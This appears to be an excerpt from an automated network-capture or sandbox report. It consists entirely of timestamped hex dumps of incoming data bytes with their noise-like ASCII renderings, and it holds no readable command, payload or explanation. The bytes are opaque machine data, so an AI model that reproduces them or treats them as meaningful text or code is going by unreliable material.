                                                                                                                                                    2022-09-29 12:59:14 UTC22839INData Raw: 16 2d 5f e8 11 a0 d1 28 cc e3 27 c5 dd 93 35 df 4e 0c 27 0d a5 1c 64 d6 02 1f d1 dd eb d0 d6 b2 23 e8 f9 0e 8b d6 24 3b 45 1a 5f 84 0a b9 a0 72 eb 45 20 38 3e b9 8c 90 79 0b 0c 4a e1 e6 3d ca e6 32 59 73 83 94 dc 6d 34 9e 4e 17 b9 47 72 8d a4 72 27 08 a5 52 d9 73 74 14 b0 98 df 4a 8e 1b 3a 20 3e a4 ef ef 44 8c 7d a3 80 bd fe 39 e6 46 0d 62 8b 82 ae 90 40 56 3f 61 53 83 db 1b d1 78 48 21 7d 09 99 bc 3a fd 1e c7 54 03 83 da 24 0f 66 81 3c 93 db 8a ae 7e 99 92 7c ea 93 63 eb 0a de 42 d2 71 82 8b f8 9d 61 1d 49 67 b4 ea ea e3 b5 cc 1b 5e 6f c2 a5 e2 00 d6 d7 f8 18 f6 d6 b5 0e 36 69 02 c9 9a b5 90 d7 95 5f 95 fd 4e 23 46 2f bf 1f 59 07 51 79 a0 08 f2 3f 20 43 06 1e 3d 93 27 f5 d1 02 96 58 d4 6f 9d dc e6 72 9a ef 71 a6 f7 35 c3 8c c1 c1 03 3b 21 7a a4 80 fb a1
                                                                                                                                                    Data Ascii: -_('5N'd#$;E_rE 8>yJ=2Ysm4NGrr'RstJ: >D}9Fb@V?aSxH!}:T$f<~|cBqaIg^o6i_N#F/YQy? C='Xorq5;!z
                                                                                                                                                    2022-09-29 12:59:14 UTC22855INData Raw: aa a4 bb 88 83 52 c1 55 e0 4d 6e 49 33 23 f3 45 39 ab 2e 62 ef 98 35 b2 48 31 f2 05 63 ad 91 d8 26 c9 61 be 6e 4e 5e 0e c6 1d 23 95 3f 2f ff 6d 8d 65 bc ac f3 b3 3b aa b1 e2 61 f7 73 17 f5 fe a0 f2 2f 2f 21 93 06 f0 2f d0 f1 1a e0 52 ef 2c 0d 35 dd d0 04 d7 7e 6d e5 d9 67 99 ce 6f 56 fe 85 77 ad 9f b6 f6 d5 c8 05 30 83 15 90 af f6 3b 16 ce 30 66 7d d1 83 c3 aa e8 56 c6 d9 af 00 70 b8 21 57 a1 fc ba 3b 40 1f fc 5b 20 14 d7 9c 8f 80 22 06 c1 98 c4 d7 73 55 fd e9 71 00 cf 20 49 10 53 c4 05 23 dd 73 86 6d ec 64 40 d9 b2 ec b5 4b a1 aa 2a 4a fb 36 a1 8d c5 62 79 b3 78 28 78 d2 be 73 fe a5 bd c8 3b bf 4d 68 a6 25 de c2 35 15 55 02 8c 22 73 e0 0a ea 26 d8 e2 bc 18 d4 7f a4 ed 4e 69 83 37 c9 eb c1 38 19 7a 91 4e 18 d5 e1 46 04 38 7b 99 7a c9 af 71 26 2f f2 07 4f
                                                                                                                                                    Data Ascii: RUMnI3#E9.b5H1c&anN^#?/me;as//!/R,5~mgoVw0;0f}Vp!W;@[ "sUq IS#smd@K*J6byx(xs;Mh%5U"s&Ni78zNF8{zq&/O
                                                                                                                                                    2022-09-29 12:59:14 UTC22871INData Raw: cc a7 4b 01 2c e6 ab bc 04 c7 64 7a 72 7f 5f 64 e9 d3 eb 15 24 cf 4c 03 be 00 5c 5f f9 84 e2 43 f0 f8 2d 80 b7 f2 1c 32 f7 f6 7f 0d 98 ed 1b e4 3e cf 54 85 49 ce 71 58 21 72 42 f9 c0 fd 06 f1 69 8a ad ff 14 00 c9 0f 97 47 1f 5b 07 08 2c 1f 7e 71 bd f6 7b 8f 60 5f 8f 64 3b b7 85 9c 76 f4 c5 f0 b2 15 fb 86 7b a6 2d 99 ed 5a 31 9e a2 7e ff bc 5f 63 6b 15 ba fe 82 d1 e0 2a e0 61 28 ac 07 a4 02 3f 25 d7 a8 97 21 5a 13 2f 09 46 80 34 8c 16 d0 ba 6b d8 7b 97 bd 43 f0 6b fa 29 6f 46 01 30 b5 6e 5c be 18 e6 72 d3 d8 3f 97 d2 10 8f 28 53 69 9e 32 43 0e 6e 70 d3 01 d4 51 09 d3 67 59 d8 48 c1 b0 7a a0 9c c7 58 4a 53 19 43 4e 72 71 1a cf 28 f6 d6 a4 49 76 87 01 a5 30 fc 83 1c aa 83 6d f8 be 9b 41 ee 55 d9 f2 6f 9e 3c 8f 05 20 61 7e 81 00 ba 7c a8 33 b2 14 48 02 fc 54
                                                                                                                                                    Data Ascii: K,dzr_d$L\_C-2>TIqX!rBiG[,~q{`_d;v{-Z1~_ck*a(?%!Z/F4k{Ck)oF0n\r?(Si2CnpQgYHzXJSCNrq(Iv0mAUo< a~|3HT
                                                                                                                                                    2022-09-29 12:59:14 UTC22887INData Raw: 90 fa ff 34 7b 30 a4 3a 44 c3 2e c8 fa eb b4 39 02 d8 34 b5 d3 73 c5 a0 17 49 c1 e4 48 e2 69 79 2e 2f 7b 4d 1f b4 37 e3 fc b1 94 c5 17 e8 f4 4c f1 b3 b8 1e 10 00 83 de ed 27 e6 7e aa d3 c7 fd 00 40 07 f3 8c cb 61 b1 56 fd c9 8e 0a f5 78 75 77 60 73 90 6a d3 e9 2b 67 19 5d 24 b7 56 cd 13 e1 55 ef 1b d6 b8 ed ac d8 65 fd da de 4a 5c 07 51 9a da 34 7e 4a cc 32 99 98 f4 be f9 58 05 78 3c 69 e8 ce 5a e4 30 41 e7 e3 b3 5b 1f 78 78 4d ad 89 c4 2a 46 99 e3 6a b1 bb 04 07 8c 1d 40 4d 87 5b 6f 79 26 26 1e 22 ec 32 de c0 31 81 93 b3 2c f0 d4 13 d1 c0 3f 04 f1 67 fa 3b c6 fe a0 2e b7 f4 51 19 21 38 04 5b ba f0 f1 ef 50 1f b5 3f fd 01 f5 25 7b 16 f9 6c 75 64 30 78 06 07 5b 3f ff 4a 55 d6 b4 fa f9 bd 93 07 4a 3a f0 dd d2 f7 c5 c8 ad 4f 16 f4 d5 fe de 00 31 b9 41 29 a6
                                                                                                                                                    Data Ascii: 4{0:D.94sIHiy./{M7L'~@aVxuw`sj+g]$VUeJ\Q4~J2Xx<iZ0A[xxM*Fj@M[oy&&"21,?g;.Q!8[P?%{lud0x[?JUJ:O1A)
                                                                                                                                                    2022-09-29 12:59:14 UTC22903INData Raw: a1 df fc 47 bf bb 10 13 80 a4 4d ec 4d f2 83 32 a8 e9 c1 65 e3 98 f5 e7 98 e8 08 a3 b7 90 4a e7 5f f0 bb 25 44 8c 42 0c 04 f3 64 e5 04 62 cc d3 c2 ef b1 0b 58 7b 0c c9 f6 0b 2c 15 b9 80 30 ad 92 3f 39 b8 a6 7e 2f 22 ce f9 07 09 70 91 48 6a 66 33 d1 52 f0 9a a9 34 f0 d4 10 f0 7f 1e 95 76 60 01 62 d9 ab a2 f0 aa 3d 11 07 86 5a dd 0e 95 df e6 ca 06 ad bc 92 d9 09 f0 5a a2 1c bc 77 6e 50 a9 b4 71 7b 10 b8 52 5a 24 73 b3 4e 04 69 f8 0f 76 4e df 06 0a 00 c6 b2 cb f2 93 ca 6b 41 8f 95 a9 45 6c 85 04 63 99 bb 91 96 97 5e 5d 9e 11 5d 7b 2d f9 72 87 f5 8c f7 97 43 c1 66 10 0a 6e c9 be 38 c5 c7 41 32 f1 8a 8c 86 cc ea 7c 27 1b b2 25 77 96 1b 0a 7a 7a dd 51 f1 33 fe bf 22 df 4a 38 62 79 e7 35 c7 45 7a d8 df ad 32 80 5e a6 e6 e8 89 b7 89 bf d7 9c c0 83 9a 2f 11 1d 5f
                                                                                                                                                    Data Ascii: GMM2eJ_%DBdbX{,0?9~/"pHjf3R4v`b=ZZwnPq{RZ$sNivNkAElc^]]{-rCfn8A2|'%wzzQ3"J8by5Ez2^/_
                                                                                                                                                    2022-09-29 12:59:14 UTC22919INData Raw: c8 a3 ef 73 ec b0 31 91 a0 b5 ef 6f 9d 9a 3e 69 45 0b 55 58 a9 c1 d6 d6 ba d5 9d e6 f7 9e 83 f4 4a cc 2a 9e b8 87 11 4b 25 8c 4d fc e6 2d 8e 7c ec 1e df 8e 08 b9 93 71 d1 1f b7 6c b4 91 bc 2e d2 77 2a 2b 66 58 f1 65 33 b2 79 b0 ac 77 80 70 9d c1 ea 85 f2 dd de e5 b5 24 75 7d d4 44 67 70 54 b5 c7 8c e9 ab be e7 a4 df de cb 3f e4 35 60 ff 0c 01 28 a3 a2 7b 40 ba 96 92 de ac 9f 19 37 eb 00 db fc 3e 7e f3 46 16 fb 62 6f 23 3b a2 9e 68 32 27 ad 29 04 32 99 8a be 34 6a d0 89 9e 85 a7 31 24 5c 27 96 aa 98 10 c0 ea 6d 2d 16 5f cd 91 b5 1e 47 7f 5d 10 8f cc 43 69 a5 7c 3e b9 85 9c 65 5c fb ed 34 3b e9 8f 6f 59 65 69 03 ef 2c a2 c0 30 4b ec c7 de 75 f8 0b be 51 e7 5e 8a 1a 98 d6 40 79 97 c7 a6 2a c4 9e f7 12 4b e6 e7 1d 8b 75 e5 59 57 2b 3d 92 7a 18 49 56 15 4f db
                                                                                                                                                    Data Ascii: s1o>iEUXJ*K%M-|ql.w*+fXe3ywp$u}DgpT?5`({@7>~Fbo#;h2')24j1$\'m-_G]Ci|>e\4;oYei,0KuQ^@y*KuYW+=zIVO
                                                                                                                                                    2022-09-29 12:59:14 UTC22935INData Raw: b4 08 a1 03 fe 35 75 47 8b 8b e2 dc cf c0 42 cf 19 55 ae 70 3e 34 4c d4 97 47 92 bf e3 8c d4 a0 63 74 2d 58 06 8a fa 00 51 79 89 7d 59 fb 71 79 ca bc 4d bb 83 18 3d 55 e9 e5 74 d3 f6 b8 34 f5 e2 9b 3d ba a4 66 0d cd 2d dd 5e 1f 21 95 a0 2c 4f 52 79 73 bb a7 0b 85 fe f1 d3 a1 e7 86 ff 7f 30 53 bd 81 30 38 ae 5c bc 6b d0 3b 08 2e 92 09 e8 0a fc 3a d2 5e 0d 8b fd 57 07 83 79 e7 03 d4 85 ee 88 06 05 ab ab bd c1 c5 b3 e2 23 ef df a7 5b b8 4a 84 4b 61 b8 4c eb 1c 86 c5 9f 03 03 de 0e c4 48 ed 93 0a 74 47 b1 97 05 f1 b7 02 a1 8b b4 b4 4f 1c 6d 02 7d d1 92 2a eb 9b 8f d7 1a 53 20 14 89 c0 9b 65 75 d0 9e 63 e9 c7 1e 34 ed 08 00 a1 33 67 d2 45 ed 65 af 74 30 00 3a 07 f3 6d 4a 16 0e d0 13 8b f9 c5 5e de 9e 13 d1 36 53 8c 99 19 10 23 ce b5 62 d0 d0 66 f8 91 84 4e 62
                                                                                                                                                    Data Ascii: 5uGBUp>4LGct-XQy}YqyM=Ut4=f-^!,ORys0S08\k;.:^Wy#[JKaLHtGOm}*S euc43gEet0:mJ^6S#bfNb
                                                                                                                                                    2022-09-29 12:59:14 UTC22951INData Raw: 49 a9 8e 75 63 bb c6 c5 a5 97 93 ca 53 ed 34 6f 72 83 9c 45 f4 c6 a9 67 d9 7d b0 68 97 ad 72 fd 59 14 b2 20 82 ef 11 cd ae 8e db 39 81 a0 b0 33 ad 7c f6 71 98 81 f1 43 87 90 2a d7 fb 8e c5 1f 29 c5 3e 1e 30 61 95 e5 67 51 3f 5d c3 09 44 47 1a 17 9a ab 3e 2d 06 76 19 ca d5 51 e3 cc e7 a0 ed 8f 13 de d4 e4 56 8e 54 d8 11 9b 42 dd 06 8f 55 9a ed 28 01 58 10 18 67 4d fa d7 1e ca b8 de 65 c3 4a 82 a8 80 c6 c8 cc 9c a5 13 8b 22 13 33 4e fe 64 dc 0b 03 bd 8d 49 a3 b0 11 61 9a 92 c2 96 ce b9 d2 a1 38 a1 63 46 f3 4a 7f 68 aa 67 5e 89 18 b3 0e 35 30 ba 7b b6 98 14 85 f5 b8 39 e0 49 e3 43 7a 1d c1 47 11 ef 3c 50 ff cd 97 85 15 77 ba e8 1e 6d 42 0d eb a4 72 04 eb 9b 2f 44 bc c8 53 58 db e8 e5 1b ae df e8 90 a4 ba fb c3 18 25 e9 33 db 6b c0 cd f0 ad bd 40 33 97 2f 9b
                                                                                                                                                    Data Ascii: IucS4orEg}hrY 93|qC*)>0agQ?]DG>-vQVTBU(XgMeJ"3NdIa8cFJhg^50{9ICzG<PwmBr/DSX%3k@3/
                                                                                                                                                    2022-09-29 12:59:14 UTC22967INData Raw: 3a 23 d5 87 83 50 24 6d 40 2a 0f 96 4b 61 3a 8f e1 d7 bc 1d 7d 4c 69 e7 4d b7 23 81 d8 4c dd e4 64 2c 66 41 b9 03 df 3c 13 c1 9e 12 cc ed 9a a7 d1 1a ab c0 00 d2 13 fe 5a 01 2e e5 39 cf 07 77 94 f0 82 d9 23 3b 33 15 42 66 89 ac 08 6b 60 06 2f 79 fe 79 4b 0d 1c d1 11 dc 2a 43 6c c8 12 5e 6e b6 c1 b2 8c d4 15 d4 17 0b a3 6c 9b 69 45 19 13 84 30 b8 a2 a4 32 f2 4a 5f 5d 9e 6c cc 9d 37 35 c8 f8 1f 81 05 55 c9 b0 31 16 e2 83 6f e6 f9 c2 dc 52 42 6e bc 77 9b 75 2b bc cd f9 3a 3e df 4c 42 92 e3 3b 3a 2b 02 37 31 46 62 30 90 bb 69 92 9d ff e9 3c 2e e2 97 4a d3 6f 6b 4e 49 c5 b0 de d9 41 15 75 86 b9 1e 29 17 dc 12 3f c2 9e ef 1c 46 0c 73 98 a9 73 18 46 e8 2f 4c 25 47 a0 27 b3 89 86 9e e3 0d 20 0c 19 3d 8e cd b9 01 61 34 3b 54 12 c8 c0 05 22 0e c8 ef 95 6d ea 90 c1
                                                                                                                                                    Data Ascii: :#P$m@*Ka:}LiM#Ld,fA<Z.9w#;3Bfk`/yyK*Cl^nliE02J_]l75U1oRBnwu+:>LB;:+71Fb0i<.JokNIAu)?FssF/L%G' =a4;T"m
                                                                                                                                                    2022-09-29 12:59:14 UTC22983INData Raw: 5d 9d f3 42 28 e3 08 ff 70 d2 0c 5b be ac 1b b5 ff a7 90 f6 46 37 b7 91 39 a4 cc b8 e0 08 8c fc b0 75 a4 5a 3a f3 bc f3 b7 7c 7d 03 7e 81 8e cc a0 a3 b1 88 88 10 7c 10 7c 27 ef 59 56 86 57 3f 18 3d 5a 8b be e3 a8 6a 1b 44 93 bb b8 e7 1e 18 e9 8d 30 64 78 6e 5d 3d bb 9e 83 39 3b 6b 16 c4 ac 89 f0 74 a1 80 b7 48 89 3a 75 50 76 8a 90 12 9a af 9d 4b 87 38 d1 76 af af cf 1b 5d 51 17 da 77 14 5c 23 e7 af 22 08 53 d7 e2 17 29 d2 51 a2 9c 82 9e 3a 47 ba 2e 40 9e bb da 79 a9 c1 72 fd dc 90 d3 e5 64 9d c3 b5 1f 7b 4a f9 10 73 c5 7d d0 b5 17 a5 31 7f a9 d6 99 fd 14 31 0a 71 56 9b a9 8f 9e 5c 7a 6f ea 35 62 eb 19 ad e8 a0 a3 81 68 49 29 0b c1 85 02 3b ba b2 5e 6c 8a f2 9d b1 fb af 98 43 14 1b a2 43 b6 70 02 38 b3 43 38 12 81 68 b9 1d 6e f7 58 94 ab b9 44 cd a8 b1 63
                                                                                                                                                    Data Ascii: ]B(p[F79uZ:|}~||'YVW?=ZjD0dxn]=9;ktH:uPvK8v]Qw\#"S)Q:G.@yrd{Js}11qV\zo5bhI);^lCCp8C8hnXDc
                                                                                                                                                    2022-09-29 12:59:14 UTC22999INData Raw: 07 c7 2f ca 91 ad d9 fe 59 16 63 e7 ef 4f 5b ba fc 24 55 62 98 ef a7 05 9c 0d 39 df 35 79 df e4 4f c9 8c 87 4b 8c 82 ed 76 f6 83 7a fa 3d 86 3c 1d 6a 3c 18 0f a7 2a 14 b1 fb f1 be aa cb f3 0e d9 7e f0 bb bc aa c2 ca e3 8c 07 cf 98 14 d4 1f b2 89 c6 9e 24 88 57 e4 ac 22 a7 a0 27 3a 96 6d fd 0d 35 ff 1a 45 67 73 44 3f 91 2d 68 ca 47 2e e3 1e cf 05 0d 1f 4f 45 50 69 a2 46 48 59 dc 7e be d8 d0 ec 75 fb c6 9c 95 2d 7b 71 df 95 2b 5f 27 1e 0a b7 bd 83 99 43 a9 bf fe 57 33 9e 9e 06 23 19 fc b0 6c 58 db 39 fd fd c7 8e 32 30 50 9d 8b 0d f9 ba c0 d9 2c a1 fb 3f 5d d4 6e d4 b6 e3 79 79 e2 9d 1a 6e b8 0a b4 fc 3f e4 81 ce 84 2c ba 8a ba 64 8c ad 3e 7a 90 9d 20 16 2a 3d 31 c1 fc 5d 1f ea b3 1d 9e 11 05 ef 15 8e af 4b 32 13 d6 f6 6c a8 6d 55 37 82 31 85 21 7c 39 b5 24
                                                                                                                                                    Data Ascii: /YcO[$Ub95yOKvz=<j<*~$W"':m5EgsD?-hG.OEPiFHY~u-{q+_'CW3#lX920P,?]nyyn?,d>z *=1]K2lmU71!|9$
                                                                                                                                                    2022-09-29 12:59:14 UTC23015INData Raw: 1d f7 17 6c d0 58 da da 7e 6c d5 c9 d5 dc 50 af 75 6e 8f 78 b0 7e 6a b2 08 dc ca c3 a7 f3 c0 e1 6b c0 09 86 ca 08 fe d4 ae 0f 98 b7 62 b5 85 ad 48 3f 0d 0b 1d 38 69 a5 5a 9b d8 cc 4c 7c 56 85 f9 ed 80 b0 9c 90 56 2b e9 56 09 78 64 b8 77 2b 31 df 50 bd ff 47 22 c3 50 84 97 c9 5d 49 66 a4 40 0b 10 d6 74 01 da b3 57 42 48 13 26 ce c2 6c 4a 33 cf 16 19 ca e9 75 be b7 61 bd cd 55 43 c7 28 23 1b 8d 48 f0 9b f4 34 11 8a c8 92 12 3c 94 d3 0b 14 19 90 12 5b f9 9e fe fd 85 56 d7 19 3d f0 22 cb ed a5 ac b1 52 2a 53 b4 4b 3f 32 43 cd 71 d3 e0 6c a8 06 8e 89 fc f3 89 5a 8c a7 0d 0d e1 45 13 bd 6a b4 40 0f 96 bb 19 68 30 c9 6f 1e 9b 8c 2f bb 38 93 be ab 40 0e 61 18 0b 2b f7 58 42 c7 97 b3 4b 4d c9 e0 30 f6 64 e2 02 2f 7e 28 85 ff 56 99 3a 0a 40 ab fe d0 82 b6 78 2d ab
                                                                                                                                                    Data Ascii: lX~lPunx~jkbH?8iZL|VV+Vxdw+1PG"P]If@tWBH&lJ3uaUC(#H4<[V="R*SK?2CqlZEj@h0o/8@a+XBKM0d/~(V:@x-
                                                                                                                                                    2022-09-29 12:59:14 UTC23031INData Raw: 4c ab 6e 34 42 e1 7b 14 cf d8 f4 06 99 04 a8 a7 44 64 46 15 d5 f6 79 a8 9f 51 15 6b f8 8e 3f 6f b5 51 5e f0 75 fa 58 8d 26 d2 f7 40 af d6 a4 19 e1 09 6d ea 34 1d b7 f0 04 53 d0 46 77 7a 33 26 af a6 bd db 20 cc cc a0 9e 6a f7 ac 38 90 ea 3f 6b 59 23 23 fa 09 63 a0 46 66 d7 c0 3e 13 91 44 20 03 d2 77 eb 05 2c 5d e6 05 04 3c 3a 34 b1 ef 19 ed 31 55 9a f0 79 f8 ae 68 d7 00 24 2b d0 ce d6 a3 0a 50 4c d4 a0 89 ad be f6 a0 89 1c 26 59 92 b8 b3 e9 e7 53 f2 97 77 c9 a2 df a2 35 b8 d2 8d 87 79 5d fa 10 1c ca ed 8c a5 0b 46 67 da a5 82 b1 17 09 5b 0f be 4f ec ed fd 1c f0 1b 22 ba 3e 8d bb 90 75 f6 f7 4f dc e4 31 14 98 64 51 26 21 f7 10 d4 0a a3 4a 4c 06 2a 09 80 27 d6 06 c4 5a a2 51 8a f8 82 3a 29 bd 12 4d b0 61 45 0e 5a 2a e7 29 4c 18 a1 4d 52 1f 13 be 77 89 5f e2
                                                                                                                                                    Data Ascii: Ln4B{DdFyQk?oQ^uX&@m4SFwz3& j8?kY##cFf>D w,]<:41Uyh$+PL&YSw5y]Fg[O">uO1dQ&!JL*'ZQ:)MaEZ*)LMRw_
                                                                                                                                                    2022-09-29 12:59:14 UTC23047INData Raw: c8 23 36 1b a8 39 75 48 30 00 24 02 b8 0c 39 68 7f b7 b4 d0 d5 10 ed ca 70 45 f1 d5 c1 b5 89 b3 6c 63 9e b9 d9 a4 bc e1 a6 07 b3 e5 b2 26 b3 38 8d 51 d0 5d 5f 36 68 8f 46 b4 a4 37 cf c0 a7 53 cb 0e 46 c2 28 c5 ec ce 02 74 54 37 4e cf 5f 1e 2f 1b e4 65 a7 c6 e5 e0 ae 55 61 00 8c d0 01 7b 77 15 00 ca 22 83 b2 a4 96 88 db 0c 5f 55 f6 f6 8a 07 48 77 7e 1f db 20 9b 17 dc c2 c6 7b 5a 71 3a 5e 3c eb fc 4a 09 3c e2 1f d9 41 1b dc d0 af c3 ec 54 0c 9e 25 70 f7 ea 41 bd 84 4d da 85 94 7e d9 58 2c 2f 35 8b 0a bc ec 82 28 13 42 1f fe bf c0 18 ae ce d3 ba 77 75 6c bb 88 93 5e 65 22 56 53 94 3e 86 6c 61 12 9a b2 d6 da 10 4f 06 96 e6 f4 96 07 41 be f5 e4 1c cd ec df 3f e8 97 38 f7 aa 6a 47 6b a4 d6 45 d2 ab 80 29 8f c0 b5 e3 c4 89 f1 12 34 2c ed 5c 01 15 f3 fd bd b7 13
                                                                                                                                                    Data Ascii: #69uH0$9hpElc&8Q]_6hF7SF(tT7N_/eUa{w"_UHw~ {Zq:^<J<AT%pAM~X,/5(Bwul^e"VS>laOA?8jGkE)4,\
                                                                                                                                                    2022-09-29 12:59:14 UTC23063INData Raw: e3 e7 58 b8 43 46 54 e4 41 a9 cd 34 83 75 29 1c 32 ea 1a 1f 0a 46 b9 f3 2f 20 55 a4 68 25 61 e9 59 e2 16 75 5b 4c 4f ae 00 20 ec 2c 2d 7f 94 2f 14 51 4e 6e a5 02 37 48 35 54 19 f4 4b 5f 6e e1 41 ff f4 3a 26 37 53 fa f6 6e 52 8c 66 96 7f 03 ad 23 f4 29 44 21 7f d8 71 60 26 f8 d3 78 cb 87 91 15 41 56 00 1b 88 01 b1 db 41 ce f9 7f 7c 66 7e 45 4d 0d 60 0a 44 e7 6c eb 13 1c 00 8f ad 7f bd 47 cd b7 f5 b3 ee 14 de d8 ee 13 6b 88 b8 46 f0 f5 73 b6 6b 08 0c cf 94 21 9b db 39 4d 0b b8 85 4c 7f 70 8d 71 db 2f f7 29 fe 25 17 8a 84 63 ca 89 9b 8d 73 ab e0 e1 09 b5 17 17 4b 9d d4 b3 f5 b1 dc 17 24 6e 80 34 30 f0 d2 c3 45 c8 bf 95 d5 34 1b ac 7c dc f9 f4 b9 4f 43 b3 31 26 e6 3f b8 34 7d f7 5b 19 8a f4 f9 40 05 3b 2e c2 50 4d 9d 3f c2 12 88 5c 33 da eb a8 e8 44 94 cc e9
                                                                                                                                                    Data Ascii: XCFTA4u)2F/ Uh%aYu[LO ,-/QNn7H5TK_nA:&7SnRf#)D!q`&xAVA|f~EM`DlGkFsk!9MLpq/)%csK$n40E4|OC1&?4}[@;.PM?\3D
                                                                                                                                                    2022-09-29 12:59:14 UTC23079INData Raw: 00 62 4e ac 16 94 b0 b7 d2 d2 29 48 ce 45 9b 2d 06 28 1d 4b 25 78 12 d4 91 08 08 97 e0 99 5d 67 f1 08 2e f7 d8 0f f5 49 f1 a3 29 1d fe 0e a6 7f 78 da f4 76 ad 2f 07 db f1 00 05 3f 6a 01 7e fd 32 73 73 d8 c7 84 87 84 09 ce e4 f5 f8 11 84 da c9 21 7a 92 dc 10 58 ff c5 3f 4c f5 ec 07 b2 d2 bc 3e 77 0e 7d 9a 2f fd ff 2f d1 c6 4a 4d c5 d1 e4 2d 1c c6 53 2c 13 94 a2 60 7a 94 0f 4c 49 26 63 30 ef a5 56 91 da 3c fb 34 9c 05 af ee d4 aa ba 6d 00 22 5c 69 a5 ca 7f 8f d4 3a fb a1 25 22 37 0d 58 55 43 89 ec d6 d3 d5 f3 c9 f7 33 2d e8 ef 11 21 fb e8 b7 2b 6f 6f 58 bd ff 12 d1 71 07 ef 85 da cd 5b 99 74 79 8b 4c ca bf f9 7c 55 d0 8b 9b 78 f1 f7 12 19 cb 82 3d c5 7b 23 d7 41 70 00 08 8d c1 e6 22 94 f4 41 04 54 64 d7 19 41 28 d9 8b 54 ff 18 51 18 48 6e c5 f3 aa 62 32 e6
                                                                                                                                                    Data Ascii: bN)HE-(K%x]g.I)xv/?j~2ss!zX?L>w}//JM-S,`zLI&c0V<4m"\i:%"7XUC3-!+ooXq[tyL|Ux={#Ap"ATdA(TQHnb2
                                                                                                                                                    2022-09-29 12:59:14 UTC23095INData Raw: 37 16 41 82 0b 21 91 81 b4 f0 98 7e 55 57 7b d2 e7 a6 7d b0 e6 e7 de f8 b3 9c f6 d1 c3 de 68 46 49 77 b5 f4 7d b4 5e f2 6b 73 f8 39 df e4 91 ca 4f d7 79 a0 b3 7f 27 f3 53 cb f8 34 86 eb f2 05 89 7c 30 8b 6c 34 35 67 a1 49 e9 50 cc 5a 96 9c 98 6d e8 18 27 0f 71 ba 87 5b 66 a1 5b 13 97 53 6d a8 9d 11 30 fe 4e 67 91 cf f3 3e 37 9e e9 4f 84 4d c3 33 49 50 77 17 aa d4 54 61 97 b4 68 92 b0 e8 38 0d 8a a2 a5 68 19 8a d2 41 5c 0a c4 10 32 42 18 3d cb 02 30 25 b2 87 10 ed 0d bc 9b 23 83 e8 db b4 82 54 9a a5 a4 e2 c7 20 ce 33 f1 1e 1c da fd 76 dd e6 82 1d 31 b8 c0 6f b1 35 76 b2 0e 66 75 c3 9c e7 b0 0f 57 bf 91 5d b1 bd 3a 1d 31 1f a2 d0 49 7a 51 c6 77 60 bc df 10 b3 0e a2 b8 aa 1c b4 fb 64 ee a1 33 5d 6a b8 98 28 ee 36 4d 03 37 33 59 37 48 bf 42 26 97 0e ff df 5c
                                                                                                                                                    Data Ascii: 7A!~UW{}hFIw}^ks9Oy'S4|0l45gIPZm'q[f[Sm0Ng>7OM3IPwTah8hA\2B=0%#T 3v1o5vfuW]:1IzQw`d3]j(6M73Y7HB&\
                                                                                                                                                    2022-09-29 12:59:14 UTC23111INData Raw: 3b de d0 41 c5 b4 ab d8 40 3a 18 fc c5 36 23 02 36 bb 6d 4d 78 0c 3c 39 13 ba 64 ca 49 71 2b 73 bc 69 ed 3e e3 09 bb eb 16 6e d6 df d0 00 80 0c fb 2c b6 06 c6 b7 5f 5e f6 5e a3 69 95 4b 53 a4 7b 76 0e f7 4d 46 57 22 24 bc 8b 05 99 30 59 26 82 33 f5 d3 87 90 b9 37 8e 3e 96 96 0f 10 be 72 37 e5 b3 76 59 34 ed d8 35 f7 31 46 5f b0 c2 4c 53 8e c6 e8 41 67 d6 0b 7c 5e 96 91 6b 0c 89 b4 1d a2 c4 d6 dd 52 29 52 79 3f 57 04 5f dc b7 b5 c9 75 69 7c ca 0a c0 12 7c 15 9e e5 21 bd 2d 19 cd c2 b2 0b 4f 08 aa b6 03 b5 0c c8 5e 6a b2 6e d4 f7 f3 3d 2f fb 10 62 42 ab dc 7a 9f 54 e8 70 dc e9 a1 79 71 85 41 28 48 da ac 70 0f 9b db 79 e9 57 e8 be 82 a0 bb 59 f1 b2 6b a0 2a 8d a9 34 d2 c4 e7 5e e9 77 c1 f0 e0 c9 e9 c4 56 5c f5 12 c1 0a 54 92 83 d8 d1 e8 b0 be e0 ad a8 40 81
                                                                                                                                                    Data Ascii: ;A@:6#6mMx<9dIq+si>n,_^^iKS{vMFW"$0Y&37>r7vY451F_LSAg|^kR)Ry?W_ui||!-O^jn=/bBzTpyqA(HpyWYk*4^wV\T@
                                                                                                                                                    2022-09-29 12:59:14 UTC23127INData Raw: 3e 8c c3 be 7d d3 56 45 27 c0 3e 8e b5 fa 87 7b ce 03 6b 69 1f 79 45 ae 89 97 08 3b 4e 05 fd 7f 4a 3b a7 6f 4e 12 8e 3f 3a 8a f2 c6 e2 da f1 38 79 ef 4a f6 34 4d 8a 71 05 90 e1 dc e3 8d 0f c8 80 80 48 95 c8 73 dc 3e fb d1 10 75 ea d3 4e b1 40 ee ea df 29 44 b3 7b e7 65 c0 44 8f a3 82 43 e7 14 bc 07 90 bf 5d 29 6c 33 68 4b 3a bd d7 f9 44 41 b8 ad d2 23 d3 27 60 66 17 3e 34 13 7d 34 bc 60 f7 0e c6 87 03 8e f0 91 ed d5 bb b1 50 9b 3d bc 06 fe dc 2f 3b 25 03 93 90 12 29 50 59 63 6f 05 69 b5 d0 c5 1b 34 92 37 04 4a e3 1b dc d3 1d e3 b3 0b 06 f8 b0 02 2b 58 e3 b0 a5 2c 49 60 19 03 28 c6 ce d2 c6 dc 77 a9 70 44 1c bf f2 51 fb c7 47 66 28 c4 3b e6 e5 30 53 4d 6f 7e 3b 27 17 58 08 4e 06 11 8b d3 12 72 72 ac b7 e1 bc d5 7a f3 8a 94 40 78 8b 13 4f 70 6a b9 11 d7 c1
                                                                                                                                                    Data Ascii: >}VE'>{kiyE;NJ;oN?:8yJ4MqHs>uN@)D{eDC])l3hK:DA#'`f>4}4`P=/;%)PYcoi47J+X,I`(wpDQGf(;0SMo~;'XNrrz@xOpj
